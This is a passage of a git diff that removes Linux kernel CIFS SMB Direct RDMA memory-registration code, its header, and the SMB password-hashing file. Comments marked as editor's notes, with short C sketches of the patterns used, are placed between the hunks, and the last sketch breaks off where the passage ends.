+-{
+-	struct smbd_mr *mr;
+-	struct ib_cqe *cqe;
+-
+-	if (wc->status) {
+-		log_rdma_mr(ERR, "status=%d\n", wc->status);
+-		cqe = wc->wr_cqe;
+-		mr = container_of(cqe, struct smbd_mr, cqe);
+-		smbd_disconnect_rdma_connection(mr->conn);
+-	}
+-}
+-
+-/*
+- * The work queue function that recovers MRs
+- * We need to call ib_dereg_mr() and ib_alloc_mr() before this MR can be used
+- * again. Both calls are slow, so we finish them in a workqueue so they do
+- * not block the I/O path.
+- * There is one workqueue that recovers MRs; there is no need to lock, as the
+- * I/O requests calling smbd_register_mr will never update the links in the
+- * mr_list.
+- */
+-static void smbd_mr_recovery_work(struct work_struct *work)
+-{
+-	struct smbd_connection *info =
+-		container_of(work, struct smbd_connection, mr_recovery_work);
+-	struct smbd_mr *smbdirect_mr;
+-	int rc;
+-
+-	list_for_each_entry(smbdirect_mr, &info->mr_list, list) {
+-		if (smbdirect_mr->state == MR_ERROR) {
+-
+-			/* recover this MR entry */
+-			rc = ib_dereg_mr(smbdirect_mr->mr);
+-			if (rc) {
+-				log_rdma_mr(ERR,
+-					"ib_dereg_mr failed rc=%x\n",
+-					rc);
+-				smbd_disconnect_rdma_connection(info);
+-				continue;
+-			}
+-
+-			smbdirect_mr->mr = ib_alloc_mr(
+-				info->pd, info->mr_type,
+-				info->max_frmr_depth);
+-			if (IS_ERR(smbdirect_mr->mr)) {
+-				log_rdma_mr(ERR, "ib_alloc_mr failed mr_type=%x max_frmr_depth=%x\n",
+-					    info->mr_type,
+-					    info->max_frmr_depth);
+-				smbd_disconnect_rdma_connection(info);
+-				continue;
+-			}
+-		} else
+-			/* This MR is being used, don't recover it */
+-			continue;
+-
+-		smbdirect_mr->state = MR_READY;
+-
+-		/* smbdirect_mr->state is updated by this function
+-		 * and is read and updated by I/O issuing CPUs trying
+-		 * to get an MR; the call to atomic_inc_return
+-		 * implies a memory barrier and guarantees this
+-		 * value is updated before waking up any calls to
+-		 * get_mr() from the I/O issuing CPUs
+-		 */
+-		if (atomic_inc_return(&info->mr_ready_count) == 1)
+-			wake_up_interruptible(&info->wait_mr);
+-	}
+-}
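/*
 * Editor's note: the wake-up above fires only when mr_ready_count moves
 * from 0 to 1, so waiters are poked once per refill rather than once per
 * MR. A hedged C11 sketch of the same pattern; wake_waiters() is a
 * stand-in for wake_up_interruptible(), not a real API:
 */
#include <stdatomic.h>
#include <stdio.h>

static atomic_int mr_ready_count;

static void wake_waiters(void)
{
	puts("wake one waiter");	/* placeholder for the real wakeup */
}

static void mark_mr_ready(void)
{
	/* fetch_add returns the old value; old 0 == pool just became non-empty */
	if (atomic_fetch_add(&mr_ready_count, 1) == 0)
		wake_waiters();
}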
+-
+-static void destroy_mr_list(struct smbd_connection *info)
+-{
+-	struct smbd_mr *mr, *tmp;
+-
+-	cancel_work_sync(&info->mr_recovery_work);
+-	list_for_each_entry_safe(mr, tmp, &info->mr_list, list) {
+-		if (mr->state == MR_INVALIDATED)
+-			ib_dma_unmap_sg(info->id->device, mr->sgl,
+-				mr->sgl_count, mr->dir);
+-		ib_dereg_mr(mr->mr);
+-		kfree(mr->sgl);
+-		kfree(mr);
+-	}
+-}
+-
+-/*
+- * Allocate MRs used for RDMA read/write
+- * The number of MRs will not exceed hardware capability in responder_resources
+- * All MRs are kept in mr_list. The MR can be recovered after it's used
+- * Recovery is done in smbd_mr_recovery_work. The content of list entry changes
+- * as MRs are used and recovered for I/O, but the list links will not change
+- */
+-static int allocate_mr_list(struct smbd_connection *info)
+-{
+-	int i;
+-	struct smbd_mr *smbdirect_mr, *tmp;
+-
+-	INIT_LIST_HEAD(&info->mr_list);
+-	init_waitqueue_head(&info->wait_mr);
+-	spin_lock_init(&info->mr_list_lock);
+-	atomic_set(&info->mr_ready_count, 0);
+-	atomic_set(&info->mr_used_count, 0);
+-	init_waitqueue_head(&info->wait_for_mr_cleanup);
+-	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+-	/* Allocate more MRs (2x) than hardware responder_resources */
+-	for (i = 0; i < info->responder_resources * 2; i++) {
+-		smbdirect_mr = kzalloc(sizeof(*smbdirect_mr), GFP_KERNEL);
+-		if (!smbdirect_mr)
+-			goto out;
+-		smbdirect_mr->mr = ib_alloc_mr(info->pd, info->mr_type,
+-					info->max_frmr_depth);
+-		if (IS_ERR(smbdirect_mr->mr)) {
+-			log_rdma_mr(ERR, "ib_alloc_mr failed mr_type=%x max_frmr_depth=%x\n",
+-				    info->mr_type, info->max_frmr_depth);
+-			goto out;
+-		}
+-		smbdirect_mr->sgl = kcalloc(
+-					info->max_frmr_depth,
+-					sizeof(struct scatterlist),
+-					GFP_KERNEL);
+-		if (!smbdirect_mr->sgl) {
+-			log_rdma_mr(ERR, "failed to allocate sgl\n");
+-			ib_dereg_mr(smbdirect_mr->mr);
+-			goto out;
+-		}
+-		smbdirect_mr->state = MR_READY;
+-		smbdirect_mr->conn = info;
+-
+-		list_add_tail(&smbdirect_mr->list, &info->mr_list);
+-		atomic_inc(&info->mr_ready_count);
+-	}
+-	return 0;
+-
+-out:
+-	kfree(smbdirect_mr);
+-
+-	list_for_each_entry_safe(smbdirect_mr, tmp, &info->mr_list, list) {
+-		list_del(&smbdirect_mr->list);
+-		ib_dereg_mr(smbdirect_mr->mr);
+-		kfree(smbdirect_mr->sgl);
+-		kfree(smbdirect_mr);
+-	}
+-	return -ENOMEM;
+-}
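/*
 * Editor's note: the out: path above is the classic "unwind what you
 * built so far" shape — on a partial allocation failure, walk the list
 * already assembled and free every element. A condensed user-space
 * sketch with a singly linked list:
 */
#include <stdlib.h>

struct node { struct node *next; };

static struct node *alloc_n(int n)
{
	struct node *head = NULL, *e;
	int i;

	for (i = 0; i < n; i++) {
		e = malloc(sizeof(*e));
		if (!e)
			goto unwind;	/* free everything allocated so far */
		e->next = head;
		head = e;
	}
	return head;

unwind:
	while (head) {
		e = head;
		head = head->next;
		free(e);
	}
	return NULL;
}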
+-
+-/*
+- * Get an MR from mr_list. This function waits until there is at least one
+- * MR available in the list. It may access the list while
+- * smbd_mr_recovery_work is recovering the MR list. This doesn't need a lock
+- * as they never modify the same places. However, several CPUs may be
+- * issuing I/O and trying to get an MR at the same time; mr_list_lock is
+- * used to protect against this.
+- */
+-static struct smbd_mr *get_mr(struct smbd_connection *info)
+-{
+-	struct smbd_mr *ret;
+-	int rc;
+-again:
+-	rc = wait_event_interruptible(info->wait_mr,
+-		atomic_read(&info->mr_ready_count) ||
+-		info->transport_status != SMBD_CONNECTED);
+-	if (rc) {
+-		log_rdma_mr(ERR, "wait_event_interruptible rc=%x\n", rc);
+-		return NULL;
+-	}
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_rdma_mr(ERR, "info->transport_status=%x\n",
+-			info->transport_status);
+-		return NULL;
+-	}
+-
+-	spin_lock(&info->mr_list_lock);
+-	list_for_each_entry(ret, &info->mr_list, list) {
+-		if (ret->state == MR_READY) {
+-			ret->state = MR_REGISTERED;
+-			spin_unlock(&info->mr_list_lock);
+-			atomic_dec(&info->mr_ready_count);
+-			atomic_inc(&info->mr_used_count);
+-			return ret;
+-		}
+-	}
+-
+-	spin_unlock(&info->mr_list_lock);
+-	/*
+-	 * It is possible that we could fail to get an MR because other processes
+-	 * may try to acquire an MR at the same time. If this is the case, retry.
+-	 */
+-	goto again;
+-}
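/*
 * Editor's note: a condensed pthread sketch of the wait/scan/retry shape
 * of get_mr() above — sleep until something may be ready, rescan under
 * the lock, and loop if another thread won the race. struct mr and the
 * list are simplified placeholders, not the kernel structures:
 */
#include <pthread.h>
#include <stdbool.h>
#include <stddef.h>

struct mr { bool ready; struct mr *next; };

static pthread_mutex_t mr_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t mr_ready_cv = PTHREAD_COND_INITIALIZER;
static struct mr *mr_list;

static struct mr *get_mr_sketch(void)
{
	struct mr *m;

	pthread_mutex_lock(&mr_lock);
	for (;;) {
		for (m = mr_list; m; m = m->next) {
			if (m->ready) {
				m->ready = false;	/* claim it */
				pthread_mutex_unlock(&mr_lock);
				return m;
			}
		}
		/* nothing ready: sleep until a recovery pass signals us */
		pthread_cond_wait(&mr_ready_cv, &mr_lock);
	}
}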
+-
+-/*
+- * Register memory for RDMA read/write
+- * pages[]: the list of pages to register memory with
+- * num_pages: the number of pages to register
+- * tailsz: if non-zero, the bytes to register in the last page
+- * writing: true if this is a RDMA write (SMB read), false for RDMA read
+- * need_invalidate: true if this MR needs to be locally invalidated after I/O
+- * return value: the MR registered, NULL if failed.
+- */
+-struct smbd_mr *smbd_register_mr(
+-	struct smbd_connection *info, struct page *pages[], int num_pages,
+-	int offset, int tailsz, bool writing, bool need_invalidate)
+-{
+-	struct smbd_mr *smbdirect_mr;
+-	int rc, i;
+-	enum dma_data_direction dir;
+-	struct ib_reg_wr *reg_wr;
+-
+-	if (num_pages > info->max_frmr_depth) {
+-		log_rdma_mr(ERR, "num_pages=%d max_frmr_depth=%d\n",
+-			num_pages, info->max_frmr_depth);
+-		return NULL;
+-	}
+-
+-	smbdirect_mr = get_mr(info);
+-	if (!smbdirect_mr) {
+-		log_rdma_mr(ERR, "get_mr returning NULL\n");
+-		return NULL;
+-	}
+-	smbdirect_mr->need_invalidate = need_invalidate;
+-	smbdirect_mr->sgl_count = num_pages;
+-	sg_init_table(smbdirect_mr->sgl, num_pages);
+-
+-	log_rdma_mr(INFO, "num_pages=0x%x offset=0x%x tailsz=0x%x\n",
+-			num_pages, offset, tailsz);
+-
+-	if (num_pages == 1) {
+-		sg_set_page(&smbdirect_mr->sgl[0], pages[0], tailsz, offset);
+-		goto skip_multiple_pages;
+-	}
+-
+-	/* We have at least two pages to register */
+-	sg_set_page(
+-		&smbdirect_mr->sgl[0], pages[0], PAGE_SIZE - offset, offset);
+-	i = 1;
+-	while (i < num_pages - 1) {
+-		sg_set_page(&smbdirect_mr->sgl[i], pages[i], PAGE_SIZE, 0);
+-		i++;
+-	}
+-	sg_set_page(&smbdirect_mr->sgl[i], pages[i],
+-		tailsz ? tailsz : PAGE_SIZE, 0);
+-
+-skip_multiple_pages:
+-	dir = writing ? DMA_FROM_DEVICE : DMA_TO_DEVICE;
+-	smbdirect_mr->dir = dir;
+-	rc = ib_dma_map_sg(info->id->device, smbdirect_mr->sgl, num_pages, dir);
+-	if (!rc) {
+-		log_rdma_mr(ERR, "ib_dma_map_sg num_pages=%x dir=%x rc=%x\n",
+-			num_pages, dir, rc);
+-		goto dma_map_error;
+-	}
+-
+-	rc = ib_map_mr_sg(smbdirect_mr->mr, smbdirect_mr->sgl, num_pages,
+-		NULL, PAGE_SIZE);
+-	if (rc != num_pages) {
+-		log_rdma_mr(ERR,
+-			"ib_map_mr_sg failed rc = %d num_pages = %x\n",
+-			rc, num_pages);
+-		goto map_mr_error;
+-	}
+-
+-	ib_update_fast_reg_key(smbdirect_mr->mr,
+-		ib_inc_rkey(smbdirect_mr->mr->rkey));
+-	reg_wr = &smbdirect_mr->wr;
+-	reg_wr->wr.opcode = IB_WR_REG_MR;
+-	smbdirect_mr->cqe.done = register_mr_done;
+-	reg_wr->wr.wr_cqe = &smbdirect_mr->cqe;
+-	reg_wr->wr.num_sge = 0;
+-	reg_wr->wr.send_flags = IB_SEND_SIGNALED;
+-	reg_wr->mr = smbdirect_mr->mr;
+-	reg_wr->key = smbdirect_mr->mr->rkey;
+-	reg_wr->access = writing ?
+-			IB_ACCESS_REMOTE_WRITE | IB_ACCESS_LOCAL_WRITE :
+-			IB_ACCESS_REMOTE_READ;
+-
+-	/*
+-	 * There is no need to wait for completion of ib_post_send
+-	 * on IB_WR_REG_MR. Hardware enforces a barrier and order of execution
+-	 * on the next ib_post_send when we actually send I/O to the remote peer
+-	 */
+-	rc = ib_post_send(info->id->qp, &reg_wr->wr, NULL);
+-	if (!rc)
+-		return smbdirect_mr;
+-
+-	log_rdma_mr(ERR, "ib_post_send failed rc=%x reg_wr->key=%x\n",
+-		rc, reg_wr->key);
+-
+-	/* If all failed, attempt to recover this MR by setting it to MR_ERROR */
+-map_mr_error:
+-	ib_dma_unmap_sg(info->id->device, smbdirect_mr->sgl,
+-		smbdirect_mr->sgl_count, smbdirect_mr->dir);
+-
+-dma_map_error:
+-	smbdirect_mr->state = MR_ERROR;
+-	if (atomic_dec_and_test(&info->mr_used_count))
+-		wake_up(&info->wait_for_mr_cleanup);
+-
+-	smbd_disconnect_rdma_connection(info);
+-
+-	return NULL;
+-}
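/*
 * Editor's note: the scatterlist setup above gives the first page
 * PAGE_SIZE - offset bytes, full middle pages PAGE_SIZE, and the last
 * page tailsz bytes (or PAGE_SIZE when tailsz is 0). A tiny sketch of
 * that per-page length computation, assuming a 4 KiB page:
 */
#define SKETCH_PAGE_SIZE 4096u

static unsigned int sg_page_len(int i, int num_pages,
				unsigned int offset, unsigned int tailsz)
{
	if (num_pages == 1)
		return tailsz;			/* single page: just the tail */
	if (i == 0)
		return SKETCH_PAGE_SIZE - offset;	/* starts mid-page */
	if (i == num_pages - 1)
		return tailsz ? tailsz : SKETCH_PAGE_SIZE;	/* last page */
	return SKETCH_PAGE_SIZE;		/* full middle page */
}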
+-
+-static void local_inv_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smbd_mr *smbdirect_mr;
+-	struct ib_cqe *cqe;
+-
+-	cqe = wc->wr_cqe;
+-	smbdirect_mr = container_of(cqe, struct smbd_mr, cqe);
+-	smbdirect_mr->state = MR_INVALIDATED;
+-	if (wc->status != IB_WC_SUCCESS) {
+-		log_rdma_mr(ERR, "invalidate failed status=%x\n", wc->status);
+-		smbdirect_mr->state = MR_ERROR;
+-	}
+-	complete(&smbdirect_mr->invalidate_done);
+-}
+-
+-/*
+- * Deregister an MR after I/O is done
+- * This function may wait if remote invalidation is not used
+- * and we have to locally invalidate the buffer to prevent data from being
+- * modified by the remote peer after the upper layer consumes it
+- */
+-int smbd_deregister_mr(struct smbd_mr *smbdirect_mr)
+-{
+-	struct ib_send_wr *wr;
+-	struct smbd_connection *info = smbdirect_mr->conn;
+-	int rc = 0;
+-
+-	if (smbdirect_mr->need_invalidate) {
+-		/* Need to finish local invalidation before returning */
+-		wr = &smbdirect_mr->inv_wr;
+-		wr->opcode = IB_WR_LOCAL_INV;
+-		smbdirect_mr->cqe.done = local_inv_done;
+-		wr->wr_cqe = &smbdirect_mr->cqe;
+-		wr->num_sge = 0;
+-		wr->ex.invalidate_rkey = smbdirect_mr->mr->rkey;
+-		wr->send_flags = IB_SEND_SIGNALED;
+-
+-		init_completion(&smbdirect_mr->invalidate_done);
+-		rc = ib_post_send(info->id->qp, wr, NULL);
+-		if (rc) {
+-			log_rdma_mr(ERR, "ib_post_send failed rc=%x\n", rc);
+-			smbd_disconnect_rdma_connection(info);
+-			goto done;
+-		}
+-		wait_for_completion(&smbdirect_mr->invalidate_done);
+-		smbdirect_mr->need_invalidate = false;
+-	} else
+-		/*
+-		 * For remote invalidation, just set it to MR_INVALIDATED
+-		 * and defer to mr_recovery_work to recover the MR for next use
+-		 */
+-		smbdirect_mr->state = MR_INVALIDATED;
+-
+-	if (smbdirect_mr->state == MR_INVALIDATED) {
+-		ib_dma_unmap_sg(
+-			info->id->device, smbdirect_mr->sgl,
+-			smbdirect_mr->sgl_count,
+-			smbdirect_mr->dir);
+-		smbdirect_mr->state = MR_READY;
+-		if (atomic_inc_return(&info->mr_ready_count) == 1)
+-			wake_up_interruptible(&info->wait_mr);
+-	} else
+-		/*
+-		 * Schedule the work to do MR recovery for future I/Os; MR
+-		 * recovery is slow and we don't want it to block the current I/O
+-		 */
+-		queue_work(info->workqueue, &info->mr_recovery_work);
+-
+-done:
+-	if (atomic_dec_and_test(&info->mr_used_count))
+-		wake_up(&info->wait_for_mr_cleanup);
+-
+-	return rc;
+-}
+diff --git a/fs/cifs/smbdirect.h b/fs/cifs/smbdirect.h
+deleted file mode 100644
+index 207ef979cd51c..0000000000000
+--- a/fs/cifs/smbdirect.h
++++ /dev/null
+@@ -1,320 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2017, Microsoft Corporation.
+- *
+- *   Author(s): Long Li <longli@microsoft.com>
+- */
+-#ifndef _SMBDIRECT_H
+-#define _SMBDIRECT_H
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-#define cifs_rdma_enabled(server)	((server)->rdma)
+-
+-#include "cifsglob.h"
+-#include <rdma/ib_verbs.h>
+-#include <rdma/rdma_cm.h>
+-#include <linux/mempool.h>
+-
+-extern int rdma_readwrite_threshold;
+-extern int smbd_max_frmr_depth;
+-extern int smbd_keep_alive_interval;
+-extern int smbd_max_receive_size;
+-extern int smbd_max_fragmented_recv_size;
+-extern int smbd_max_send_size;
+-extern int smbd_send_credit_target;
+-extern int smbd_receive_credit_max;
+-
+-enum keep_alive_status {
+-	KEEP_ALIVE_NONE,
+-	KEEP_ALIVE_PENDING,
+-	KEEP_ALIVE_SENT,
+-};
+-
+-enum smbd_connection_status {
+-	SMBD_CREATED,
+-	SMBD_CONNECTING,
+-	SMBD_CONNECTED,
+-	SMBD_NEGOTIATE_FAILED,
+-	SMBD_DISCONNECTING,
+-	SMBD_DISCONNECTED,
+-	SMBD_DESTROYED
+-};
+-
+-/*
+- * The context for the SMBDirect transport
+- * Everything related to the transport is here. It has several logical parts
+- * 1. RDMA related structures
+- * 2. SMBDirect connection parameters
+- * 3. Memory registrations
+- * 4. Receive and reassembly queues for data receive path
+- * 5. mempools for allocating packets
+- */
+-struct smbd_connection {
+-	enum smbd_connection_status transport_status;
+-
+-	/* RDMA related */
+-	struct rdma_cm_id *id;
+-	struct ib_qp_init_attr qp_attr;
+-	struct ib_pd *pd;
+-	struct ib_cq *send_cq, *recv_cq;
+-	struct ib_device_attr dev_attr;
+-	int ri_rc;
+-	struct completion ri_done;
+-	wait_queue_head_t conn_wait;
+-	wait_queue_head_t disconn_wait;
+-
+-	struct completion negotiate_completion;
+-	bool negotiate_done;
+-
+-	struct work_struct disconnect_work;
+-	struct work_struct post_send_credits_work;
+-
+-	spinlock_t lock_new_credits_offered;
+-	int new_credits_offered;
+-
+-	/* Connection parameters defined in [MS-SMBD] 3.1.1.1 */
+-	int receive_credit_max;
+-	int send_credit_target;
+-	int max_send_size;
+-	int max_fragmented_recv_size;
+-	int max_fragmented_send_size;
+-	int max_receive_size;
+-	int keep_alive_interval;
+-	int max_readwrite_size;
+-	enum keep_alive_status keep_alive_requested;
+-	int protocol;
+-	atomic_t send_credits;
+-	atomic_t receive_credits;
+-	int receive_credit_target;
+-	int fragment_reassembly_remaining;
+-
+-	/* Memory registrations */
+-	/* Maximum number of RDMA read/write outstanding on this connection */
+-	int responder_resources;
+-	/* Maximum number of pages in a single RDMA write/read on this connection */
+-	int max_frmr_depth;
+-	/*
+-	 * If payload is less than or equal to the threshold,
+-	 * use RDMA send/recv to send upper layer I/O.
+-	 * If payload is more than the threshold,
+-	 * use RDMA read/write through memory registration for I/O.
+-	 */
+-	int rdma_readwrite_threshold;
+-	enum ib_mr_type mr_type;
+-	struct list_head mr_list;
+-	spinlock_t mr_list_lock;
+-	/* The number of available MRs ready for memory registration */
+-	atomic_t mr_ready_count;
+-	atomic_t mr_used_count;
+-	wait_queue_head_t wait_mr;
+-	struct work_struct mr_recovery_work;
+-	/* Used by transport to wait until all MRs are returned */
+-	wait_queue_head_t wait_for_mr_cleanup;
+-
+-	/* Activity accounting */
+-	atomic_t send_pending;
+-	wait_queue_head_t wait_send_pending;
+-	wait_queue_head_t wait_post_send;
+-
+-	/* Receive queue */
+-	struct list_head receive_queue;
+-	int count_receive_queue;
+-	spinlock_t receive_queue_lock;
+-
+-	struct list_head empty_packet_queue;
+-	int count_empty_packet_queue;
+-	spinlock_t empty_packet_queue_lock;
+-
+-	wait_queue_head_t wait_receive_queues;
+-
+-	/* Reassembly queue */
+-	struct list_head reassembly_queue;
+-	spinlock_t reassembly_queue_lock;
+-	wait_queue_head_t wait_reassembly_queue;
+-
+-	/* total data length of reassembly queue */
+-	int reassembly_data_length;
+-	int reassembly_queue_length;
+-	/* the offset to first buffer in reassembly queue */
+-	int first_entry_offset;
+-
+-	bool send_immediate;
+-
+-	wait_queue_head_t wait_send_queue;
+-
+-	/*
+-	 * Indicate if we have received a full packet on the connection
+-	 * This is used to identify the first SMBD packet of an assembled
+-	 * payload (SMB packet) in the reassembly queue so we can return an
+-	 * RFC1002 length to the upper layer to indicate the length of the SMB
+-	 * packet received
+-	 */
+-	bool full_packet_received;
+-
+-	struct workqueue_struct *workqueue;
+-	struct delayed_work idle_timer_work;
+-
+-	/* Memory pool for preallocating buffers */
+-	/* request pool for RDMA send */
+-	struct kmem_cache *request_cache;
+-	mempool_t *request_mempool;
+-
+-	/* response pool for RDMA receive */
+-	struct kmem_cache *response_cache;
+-	mempool_t *response_mempool;
+-
+-	/* for debug purposes */
+-	unsigned int count_get_receive_buffer;
+-	unsigned int count_put_receive_buffer;
+-	unsigned int count_reassembly_queue;
+-	unsigned int count_enqueue_reassembly_queue;
+-	unsigned int count_dequeue_reassembly_queue;
+-	unsigned int count_send_empty;
+-};
+-
+-enum smbd_message_type {
+-	SMBD_NEGOTIATE_RESP,
+-	SMBD_TRANSFER_DATA,
+-};
+-
+-#define SMB_DIRECT_RESPONSE_REQUESTED 0x0001
+-
+-/* SMBD negotiation request packet [MS-SMBD] 2.2.1 */
+-struct smbd_negotiate_req {
+-	__le16 min_version;
+-	__le16 max_version;
+-	__le16 reserved;
+-	__le16 credits_requested;
+-	__le32 preferred_send_size;
+-	__le32 max_receive_size;
+-	__le32 max_fragmented_size;
+-} __packed;
+-
+-/* SMBD negotiation response packet [MS-SMBD] 2.2.2 */
+-struct smbd_negotiate_resp {
+-	__le16 min_version;
+-	__le16 max_version;
+-	__le16 negotiated_version;
+-	__le16 reserved;
+-	__le16 credits_requested;
+-	__le16 credits_granted;
+-	__le32 status;
+-	__le32 max_readwrite_size;
+-	__le32 preferred_send_size;
+-	__le32 max_receive_size;
+-	__le32 max_fragmented_size;
+-} __packed;
+-
+-/* SMBD data transfer packet with payload [MS-SMBD] 2.2.3 */
+-struct smbd_data_transfer {
+-	__le16 credits_requested;
+-	__le16 credits_granted;
+-	__le16 flags;
+-	__le16 reserved;
+-	__le32 remaining_data_length;
+-	__le32 data_offset;
+-	__le32 data_length;
+-	__le32 padding;
+-	__u8 buffer[];
+-} __packed;
+-
+-/* The packet fields for a registered RDMA buffer */
+-struct smbd_buffer_descriptor_v1 {
+-	__le64 offset;
+-	__le32 token;
+-	__le32 length;
+-} __packed;
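/*
 * Editor's note: an illustrative encoder for the v1 buffer descriptor
 * above — offset, token and length are little-endian on the wire, so
 * byte-at-a-time packing keeps the sketch portable across hosts:
 */
#include <stdint.h>

static void put_le32(uint8_t *p, uint32_t v)
{
	p[0] = (uint8_t)v;
	p[1] = (uint8_t)(v >> 8);
	p[2] = (uint8_t)(v >> 16);
	p[3] = (uint8_t)(v >> 24);
}

/* 16 bytes total: 8-byte offset, then 4-byte token, then 4-byte length */
static void pack_buffer_descriptor_v1(uint8_t out[16], uint64_t offset,
				      uint32_t token, uint32_t length)
{
	put_le32(out, (uint32_t)offset);
	put_le32(out + 4, (uint32_t)(offset >> 32));
	put_le32(out + 8, token);
	put_le32(out + 12, length);
}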
+-
+-/* Maximum number of SGEs used by smbdirect.c in any send work request */
+-#define SMBDIRECT_MAX_SEND_SGE	6
+-
+-/* The context for a SMBD request */
+-struct smbd_request {
+-	struct smbd_connection *info;
+-	struct ib_cqe cqe;
+-
+-	/* the SGE entries for this work request */
+-	struct ib_sge sge[SMBDIRECT_MAX_SEND_SGE];
+-	int num_sge;
+-
+-	/* SMBD packet header follows this structure */
+-	u8 packet[];
+-};
+-
+-/* Maximum number of SGEs used by smbdirect.c in any receive work request */
+-#define SMBDIRECT_MAX_RECV_SGE	1
+-
+-/* The context for a SMBD response */
+-struct smbd_response {
+-	struct smbd_connection *info;
+-	struct ib_cqe cqe;
+-	struct ib_sge sge;
+-
+-	enum smbd_message_type type;
+-
+-	/* Link to receive queue or reassembly queue */
+-	struct list_head list;
+-
+-	/* Indicate if this is the 1st packet of a payload */
+-	bool first_segment;
+-
+-	/* SMBD packet header and payload follows this structure */
+-	u8 packet[];
+-};
+-
+-/* Create a SMBDirect session */
+-struct smbd_connection *smbd_get_connection(
+-	struct TCP_Server_Info *server, struct sockaddr *dstaddr);
+-
+-/* Reconnect SMBDirect session */
+-int smbd_reconnect(struct TCP_Server_Info *server);
+-/* Destroy SMBDirect session */
+-void smbd_destroy(struct TCP_Server_Info *server);
+-
+-/* Interface for carrying upper layer I/O through send/recv */
+-int smbd_recv(struct smbd_connection *info, struct msghdr *msg);
+-int smbd_send(struct TCP_Server_Info *server,
+-	int num_rqst, struct smb_rqst *rqst);
+-
+-enum mr_state {
+-	MR_READY,
+-	MR_REGISTERED,
+-	MR_INVALIDATED,
+-	MR_ERROR
+-};
+-
+-struct smbd_mr {
+-	struct smbd_connection	*conn;
+-	struct list_head	list;
+-	enum mr_state		state;
+-	struct ib_mr		*mr;
+-	struct scatterlist	*sgl;
+-	int			sgl_count;
+-	enum dma_data_direction	dir;
+-	union {
+-		struct ib_reg_wr	wr;
+-		struct ib_send_wr	inv_wr;
+-	};
+-	struct ib_cqe		cqe;
+-	bool			need_invalidate;
+-	struct completion	invalidate_done;
+-};
+-
+-/* Interfaces to register and deregister MR for RDMA read/write */
+-struct smbd_mr *smbd_register_mr(
+-	struct smbd_connection *info, struct page *pages[], int num_pages,
+-	int offset, int tailsz, bool writing, bool need_invalidate);
+-int smbd_deregister_mr(struct smbd_mr *mr);
+-
+-#else
+-#define cifs_rdma_enabled(server)	0
+-struct smbd_connection {};
+-static inline void *smbd_get_connection(
+-	struct TCP_Server_Info *server, struct sockaddr *dstaddr) {return NULL;}
+-static inline int smbd_reconnect(struct TCP_Server_Info *server) {return -1; }
+-static inline void smbd_destroy(struct TCP_Server_Info *server) {}
+-static inline int smbd_recv(struct smbd_connection *info, struct msghdr *msg) {return -1; }
+-static inline int smbd_send(struct TCP_Server_Info *server, int num_rqst, struct smb_rqst *rqst) {return -1; }
+-#endif
+-
+-#endif
+diff --git a/fs/cifs/smbencrypt.c b/fs/cifs/smbencrypt.c
+deleted file mode 100644
+index 4a04877538691..0000000000000
+--- a/fs/cifs/smbencrypt.c
++++ /dev/null
+@@ -1,91 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+-   Unix SMB/Netbios implementation.
+-   Version 1.9.
+-   SMB parameters and setup
+-   Copyright (C) Andrew Tridgell 1992-2000
+-   Copyright (C) Luke Kenneth Casson Leighton 1996-2000
+-   Modified by Jeremy Allison 1995.
+-   Copyright (C) Andrew Bartlett <abartlet@samba.org> 2002-2003
+-   Modified by Steve French (sfrench@us.ibm.com) 2002-2003
+-
+-*/
+-
+-#include <linux/module.h>
+-#include <linux/slab.h>
+-#include <linux/fips.h>
+-#include <linux/fs.h>
+-#include <linux/string.h>
+-#include <linux/kernel.h>
+-#include <linux/random.h>
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifsproto.h"
+-#include "../smbfs_common/md4.h"
+-
+-#ifndef false
+-#define false 0
+-#endif
+-#ifndef true
+-#define true 1
+-#endif
+-
+-/* following came from the other byteorder.h to avoid include conflicts */
+-#define CVAL(buf,pos) (((unsigned char *)(buf))[pos])
+-#define SSVALX(buf,pos,val) (CVAL(buf,pos)=(val)&0xFF,CVAL(buf,pos+1)=(val)>>8)
+-#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((__u16)(val)))
+-
+-/* produce a md4 message digest from data of length n bytes */
+-static int
+-mdfour(unsigned char *md4_hash, unsigned char *link_str, int link_len)
+-{
+-	int rc;
+-	struct md4_ctx mctx;
+-
+-	rc = cifs_md4_init(&mctx);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init MD4\n", __func__);
+-		goto mdfour_err;
+-	}
+-	rc = cifs_md4_update(&mctx, link_str, link_len);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update MD4\n", __func__);
+-		goto mdfour_err;
+-	}
+-	rc = cifs_md4_final(&mctx, md4_hash);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not finalize MD4\n", __func__);
+-
+-
+-mdfour_err:
+-	return rc;
+-}
+-
+-/*
+- * Creates the MD4 hash of the user's password in NT UNICODE.
+- */
+-
+-int
+-E_md4hash(const unsigned char *passwd, unsigned char *p16,
+-	const struct nls_table *codepage)
+-{
+-	int rc;
+-	int len;
+-	__le16 wpwd[129];
+-
+-	/* Password cannot be longer than 128 characters */
+-	if (passwd) /* Password must be converted to NT unicode */
+-		len = cifs_strtoUTF16(wpwd, passwd, 128, codepage);
+-	else {
+-		len = 0;
+-		*wpwd = 0; /* Ensure string is null terminated */
+-	}
+-
+-	rc = mdfour(p16, (unsigned char *) wpwd, len * sizeof(__le16));
+-	memzero_explicit(wpwd, sizeof(wpwd));
+-
+-	return rc;
+-}
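/*
 * Editor's note: E_md4hash() above is the NT hash — convert the password
 * to UTF-16LE, then take the MD4 digest of those bytes. A hedged sketch
 * of the ASCII-only conversion step; the kernel uses cifs_strtoUTF16()
 * with the mount's codepage, and md4() here is an assumed helper you
 * must supply:
 */
#include <stdint.h>
#include <string.h>

extern void md4(uint8_t digest[16], const uint8_t *data, size_t len);

static void nt_hash_ascii(uint8_t p16[16], const char *passwd)
{
	uint8_t wpwd[128 * 2];
	size_t i, len = strlen(passwd);

	if (len > 128)
		len = 128;	/* password capped at 128 characters */
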